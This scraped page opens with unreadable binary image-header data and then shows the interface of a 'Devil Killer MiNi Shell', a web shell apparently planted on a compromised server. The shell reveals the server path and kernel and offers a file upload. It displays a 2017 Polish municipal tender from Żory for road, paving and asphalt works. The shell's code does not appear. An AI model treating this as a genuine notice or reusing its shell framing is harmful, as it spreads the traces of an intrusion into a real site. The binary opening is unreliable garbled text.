JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170120/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170120/11677-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bip.zory.pl/?c=7074' target='_blank'>http://bip.zory.pl/?c=7074</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 11677 - 2017
              z dnia 2017-01-20 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Żory: Budowa i utwardzenie dróg w Żorach  etap I<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Miejska  Żory, krajowy numer identyfikacyjny
              27625554200000, ul.
              Al. Wojska Polskiego 
              25,
              44240  
              Żory, woj.
              śląskie, państwo
              Polska, tel.
              324 348 245, e-mail
              umzory@um.zory.pl, faks
              324 348 248.
              <br />
              Adres strony internetowej (URL): http://bip.zory.pl/?c=7074<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://bip.zory.pl/?c=7074</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://bip.zory.pl/?c=7074</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />w formie pisemnej za pomocą operatora pocztowego, osobiście lub za pośrednictwem posłańca<br />
                Adres:
                <br />Urząd Miasta Żory Al. Wojska Polskiego 25 44-240 Żory pok. INFORMACJA-parter</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Budowa i utwardzenie dróg w Żorach  etap I<br /><b>Numer referencyjny: </b>ZP.271.2.4.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Część nr 1 Utwardzenie dróg gminnych tłuczniem kamiennym:

Utwardzenie dróg z kruszywa o grubości 35 cm po zagęszczeniu  około 15.000 m2
Zakres robót:
	organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
	roboty rozbiórkowe istniejących elementów dróg (jeśli będą wymagane),
	wykonanie korytowania po trasie nowej nawierzchni utwardzonej drogi,
	załadunek i wywóz materiałów z korytowania na wysyp (z potwierdzeniem odbioru 
i opłatą za składowanie).
	profilowanie i zagęszczenie podłoża,
	wykonanie utwardzenia nawierzchni drogi tłuczniem kamiennym o średniej szerokości 5,0 m.
	regulacja pionowa włazów kanałowych studni, zaworów i zasuw (jeśli będzie konieczna),
	pełna obsługa geodezyjna ( odtworzenie i okazanie granic działek drogowych, pomiar geodezyjny powykonawczy ).
	ręczne plantowanie poboczy i porządkowanie terenu,
	humusowanie i obsianie poboczy trawą,

Roboty w ramach części 1 wykonywane będą na każdorazowe zlecenie Zamawiającego, wskazujące zakres robót do wykonania oraz termin i miejsce ich wykonania 
w zależności od bieżących potrzeb w granicach administracyjnych miasta Żory.
Ostatnie zlecenie zostanie przekazane Wykonawcy nie później niż do 15.10.2017r.

Część nr 2 Nawierzchnie z kostki brukowej

Zadanie 1  Wykonanie chodnika przy ul. Brzozowej
	organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
	rozbiórka nawierzchni asfaltowej, z płyt chodnikowych, krawężników oraz obrzeży betonowych na ławie betonowej z oporem,
	załadunek i wywóz materiałów z rozbiórki na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
	korytowanie pod nowe nawierzchnie brukowe,
	załadunek i wywóz materiałów z korytowania,
	wykonanie wpustów deszczowych,
	przedłużenie przykanalików deszczowych,
	wykonanie warstwy odsączającej z piasku,
	wykonanie nowej podbudowy tłuczniowej pod nawierzchnie brukowe,
	ułożenie nowych obrzeży betonowych 8x30cm na ławie betonowej z oporem,
	ułożenie nowych krawężników betonowych na ławie betonowej z oporem,
	wykonanie nawierzchni brukowych chodników z kostki brukowej betonowej wibroprasowanej gr. 8cm na podsypce cementowo- piaskowej gr. 3cm, rodzaj kostki (prostokąt szara),
	wykonanie nawierzchni asfaltobetonowej,
	wymiana oznakowania pionowego,
	regulacja pionowa studzienek, zaworów oraz zasuw,
	przycięcie gałęzi,
	pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
	badania nośności podłoża gruntowego,
	humusowanie pobocza z obsianiem trawą,
	porządkowanie terenu po robotach budowlanych.

Zadanie 2  Wykonanie drogi ul. Elsnera
	organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
	rozbiórka nawierzchni asfaltowej,
	załadunek i wywóz materiałów z rozbiórki na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
	wyrównanie i czyszczenie istniejącej podbudowy z tłucznia,
	korytowanie pod poszerzenie drogi,,
	załadunek i wywóz materiałów z korytowania,
	wykonanie studni chłonnych betonowych,
	wykonanie wpustów deszczowych,
	wykonanie przykanalików deszczowych wraz z podłączeniem,
	wykonanie warstwy odsączającej z piasku na poszerzeniach,
	wykonanie nowej podbudowy tłuczniowej pod nawierzchnie brukowe na poszerzenie,
	ułożenie nowych krawężników betonowych na ławie betonowej z oporem,
	wykonanie nawierzchni brukowych jezdni z kostki brukowej betonowej wibroprasowanej gr. 8cm na podsypce cementowo- piaskowej gr. 3cm, rodzaj kostki (prostokąt grafitowa, eko-kostka szara),
	wykonanie nawierzchni asfaltobetonowej na połączeniu z istniejącą drogą,
	regulacja pionowa studzienek, zaworów oraz zasuw,
	ułożenie rur osłonowych,
	pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
	badania nośności podłoża gruntowego,
	humusowanie pobocza z obsianiem trawą,
	porządkowanie terenu po robotach budowlanych.

Zadanie 3  Wykonanie zatoki parkingowej przy Al. Zjednoczonej Europy
	organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
	rozbiórka nawierzchni asfaltowej, z kostki betonowej, krawężników i obrzeży,
	załadunek i wywóz materiałów z rozbiórki na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
	korytowanie pod zatokę,
	załadunek i wywóz materiałów z korytowania,
	wykonanie stabilizacji gruntu cementem,
	wykonanie warstwy odsączającej z piasku,
	wykonanie podbudowy z betonu cementowego w zatoce,
	wykonanie nowej podbudowy tłuczniowej pod chodnikiem,
	ułożenie nowych krawężników betonowych na ławie betonowej z oporem,
	wykonanie nawierzchni brukowych zatoki z kostki granitowej 15x15 cm na podsypce cementowo-piaskowej z wypełnieniem spoin betonem,
	wykonanie nawierzchni brukowej dojścia z kostki betonowej wibroprasowanej gr. 8cm na podsypce cementowo- piaskowej gr. 3cm, rodzaj kostki (prostokąt szara),
	wykonanie nawierzchni asfaltobetonowej na połączeniu z istniejącą drogą,
	regulacja pionowa studzienek, zaworów oraz zasuw,
	ułożenie rur osłonowych,
	przestawienie barier ochronnych,
	pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
	badania nośności podłoża gruntowego,
	humusowanie pobocza z obsianiem trawą,
	porządkowanie terenu po robotach budowlanych.

Zadanie 4  Wykonanie zatoki parkingowej przy ul. Astrów w Żorach
	organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
	rozbiórka nawierzchni asfaltowej, z kostki betonowej, krawężników i obrzeży,
	załadunek i wywóz materiałów z rozbiórki na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
	korytowanie pod zatokę,
	załadunek i wywóz materiałów z korytowania,
	wykonanie warstwy odsączającej z piasku,
	wykonanie podbudowy tłuczniowej,
	wykonanie nawierzchni brukowej zatoki i chodnika z kostki betonowej wibroprasowanej gr. 8cm na podsypce cementowo- piaskowej gr. 3cm, rodzaj kostki (prostokąt szara, linie segregacyjne z kostki prostokątnej czerwonej),
	wykonanie nawierzchni asfaltobetonowej na połączeniu z istniejącą drogą,
	regulacja pionowa studzienek,
	ułożenie rur osłonowych,
	wykonanie oznakowania poziomego i pionowego przejścia dla pieszych,
	pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
	badania nośności podłoża gruntowego,
	humusowanie pobocza z obsianiem trawą,
	porządkowanie terenu po robotach budowlanych.

Zadanie 5  Wykonanie zatoki parkingowej przy ul. Męczenników Oświęcimskich
	organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
	rozbiórka nawierzchni asfaltowej, z kostki betonowej, krawężników i obrzeży,
	załadunek i wywóz materiałów z rozbiórki na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
	korytowanie pod zatokę,
	załadunek i wywóz materiałów z korytowania,
	wykonanie warstwy odsączającej z piasku,
	wykonanie podbudowy tłuczniowej,
	wykonanie nawierzchni brukowej zatoki z kostki betonowej wibroprasowanej gr. 8cm na podsypce cementowo- piaskowej gr. 3cm, rodzaj kostki (prostokąt szara, linie segregacyjne z kostki prostokątnej czerwonej),
	przełożenie nawierzchni istniejącego chodnika z kostki betonowej,
	wykonanie nawierzchni asfaltobetonowej na połączeniu z istniejącą drogą,
	regulacja pionowa studzienek,
	ułożenie rur osłonowych,
	wykonanie oznakowania poziomego i pionowego przejścia dla pieszych,
	pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
	badania nośności podłoża gruntowego,
	humusowanie pobocza z obsianiem trawą,
	porządkowanie terenu po robotach budowlanych.

Zadanie 6  Wykonanie chodnika przy ul. Przemysłowej
	organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
	rozbiórka nawierzchni asfaltowej, krawężników betonowych na ławie betonowej z oporem,
	załadunek i wywóz materiałów z rozbiórki na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
	korytowanie pod nowe nawierzchnie brukowe,
	załadunek i wywóz materiałów z korytowania,
	wykonanie warstwy odsączającej z piasku,
	wykonanie nowej podbudowy tłuczniowej pod nawierzchnie brukowe,
	ułożenie nowych obrzeży betonowych 8x30cm na ławie betonowej z oporem,
	ułożenie nowych krawężników betonowych na ławie betonowej z oporem,
	wykonanie nawierzchni brukowych chodników z kostki brukowej betonowej wibroprasowanej gr. 8cm na podsypce cementowo- piaskowej gr. 3cm, rodzaj kostki (prostokąt szara),
	wykonanie nawierzchni asfaltobetonowej na połączeniu z istniejącą drogą,
	wykonanie oznakowania poziomego i pionowego przejścia dla pieszych,
	regulacja pionowa studzienek, zaworów oraz zasuw,
	pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
	badania nośności podłoża gruntowego,
	humusowanie pobocza z obsianiem trawą,
	porządkowanie terenu po robotach budowlanych.


Część nr 3  Nawierzchnie asfaltowe

Zadanie 1  Wykonanie zjazdu z ul. Małej
	organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
	rozbiórka nawierzchni asfaltowej,
	załadunek i wywóz materiałów z rozbiórki na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
	korytowanie pod zjazd,
	załadunek i wywóz materiałów z korytowania,
	wykonanie przepustu drogowego z rur betonowych 400 na ławie żwirowej z wykonaniem izolacji i murków czołowych betonowych,
	wykonanie warstwy odsączającej z piasku,
	wykonanie podbudowy tłuczniowej,
	wykonanie nawierzchni z betonu asfaltowego,
	wykonanie poboczy z tłucznia kamiennego,
	wykonanie oznakowania pionowego,
	pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
	badania nośności podłoża gruntowego,
	humusowanie pobocza z obsianiem trawą,
	porządkowanie terenu po robotach budowlanych.

Zadanie 2  Przebudowa skrzyżowania Al. Armii Krajowej z ul. Komunalną.
	organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
	rozbiórka nawierzchni asfaltowej i krawężników,
	frezowanie nawierzchni asfaltowej,
	załadunek i wywóz materiałów z rozbiórki na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
	korytowanie pod nawierzchnie asfaltobotonowe,
	załadunek i wywóz materiałów z korytowania,
	wykonanie stabilizacji gruntu cementem,
	wykonanie warstwy odsączającej z piasku,
	wykonanie podbudowy tłuczniowej,
	ułożenie krawężników betonowych na ławie betonowej,
	wykonanie podbudowy z betonu asfaltowego,
	wykonanie warstwy wiążącej z betonu asfaltowego,
	wykonanie warstwy ścieralnej z mieszanki SMA,
	regulacja pionowa studzienek z wymianą włazów na typ ciężki,
	wykonanie oznakowania poziomego i pionowego,
	pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
	badania nośności podłoża gruntowego,
	humusowanie pobocza z obsianiem trawą,
	porządkowanie terenu po robotach budowlanych.

Zadanie 3  Modernizacja drogi bocznej od ul. Kłapczyka
	organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
	rozbiórka nawierzchni asfaltowej i krawężników,
	załadunek i wywóz materiałów z rozbiórki na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
	korytowanie pod krawężniki,
	załadunek i wywóz materiałów z korytowania,
	wyrównanie istniejącej podbudowy tłuczniem,
	ułożenie krawężników betonowych na ławie betonowej,
	wykonanie nawierzchni z betonu asfaltowego,
	regulacja pionowa studzienek, zaworów i zasuw,
	przebrukowanie istniejących zjazdów,
	wykonanie wpustu deszczowego wraz z przykanalikiem i podłączeniem do istniejącej studni,
	pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
	badania nośności podłoża gruntowego,
	humusowanie pobocza z obsianiem trawą,
	porządkowanie terenu po robotach budowlanych.

Zadanie 4  Przebudowa drogi ul. Kłapczyka pomiędzy skrzyżowaniami z Al. Wojska Polskiego i ul. Prusa
	organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
	rozbiórka nawierzchni asfaltowej, z kostki betonowej, krawężników i obrzeży,
	załadunek i wywóz materiałów z rozbiórki na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
	korytowanie pod poszerzenie,
	załadunek i wywóz materiałów z korytowania,
	wykonanie warstwy odsączającej z piasku na poszerzeniu,
	wykonanie nowej podbudowy tłuczniowej na poszerzeniu,
	ułożenie nowych obrzeży betonowych 8x30cm na ławie betonowej z oporem,
	ułożenie nowych krawężników betonowych na ławie betonowej z oporem,
	wykonanie nawierzchni brukowych chodników z kostki brukowej betonowej wibroprasowanej gr. 8cm na podsypce cementowo- piaskowej gr. 3cm, rodzaj kostki (prostokąt szara),
	wykonanie nawierzchni asfaltobetonowej na poszerzeniu
	regulacja pionowa studzienek, zaworów i zasuw,
	przebrukowanie istniejących zjazdów i chodnika,
	wykonanie oznakowania poziomego przejścia dla pieszych,
	pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
	badania nośności podłoża gruntowego,
	humusowanie pobocza z obsianiem trawą,
	porządkowanie terenu po robotach budowlanych.<br /><br /><b>II.5) Główny kod CPV: </b>45000000-7<br /><b> Dodatkowe kody CPV:</b>45112700-2,
                45233142-6,
                45233222-1,
                45232130-2,
                45231110-9,
                34922100-7<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/11/2017<br /></div><div style="padding-left: 20px">
                    data zakończenia: 30/06/2017<br /></div><div style="padding-left: 20px">
                    data zakończenia: 30/06/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Termin realizacji zamówienia:
Część 1 do 30.11.2017r - termin wymagany
Część 2 do 30.06.2017r - termin wymagany
Część 3 do  30.06.2017r  - termin wymagany
</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie opisuje żadnych wymagań do warunku których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie opisuje żadnych wymagań do warunku których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                3.	Zamawiający uzna warunek za spełniony jeżeli:
1)	Wykonawca w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie wykonał:
a)	  jedną robotę budowlaną polegającą na budowie lub przebudowie lub remoncie nawierzchni dla ruchu kołowego lub pieszego, która obejmowała swoim zakresem wykonanie min. 1000 m2 powierzchni z kostki brukowej oraz załączy dowody określające czy te roboty budowlane zostały wykonane należycie, w szczególności informacje o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone  
w przypadku ubiegania się o realizację części 2
b)	  jedną robotę budowlaną polegającą na budowie lub przebudowie lub remoncie nawierzchni dla ruchu kołowego lub pieszego, która obejmowała swoim zakresem wykonanie min. 800 m2 powierzchni z asfaltu oraz załączy dowody określające czy te roboty budowlane zostały wykonane należycie, w szczególności informacje o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone  w przypadku ubiegania się o realizację części 3
c)	  Zamawiający nie opisuje żadnych wymagań do  warunku których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny - w przypadku ubiegania się o realizację części 1.
2)	 Wykonawca skieruje osobę, do realizacji zamówienia w szczególności    odpowiedzialną za kierowanie robotami budowlanymi w specjalności obejmującej uprawnienia do budowy lub przebudowy dróg (uprawnienia w zakresie kierowania, nadzorowania i kontrolowania budowy) wraz z informacjami na temat jej kwalifikacji zawodowych niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nią czynności, oraz informacją o podstawie do dysponowania tą osobą  w przypadku ubiegania się o realizację części 1 i/lub 2 i/lub 3. 

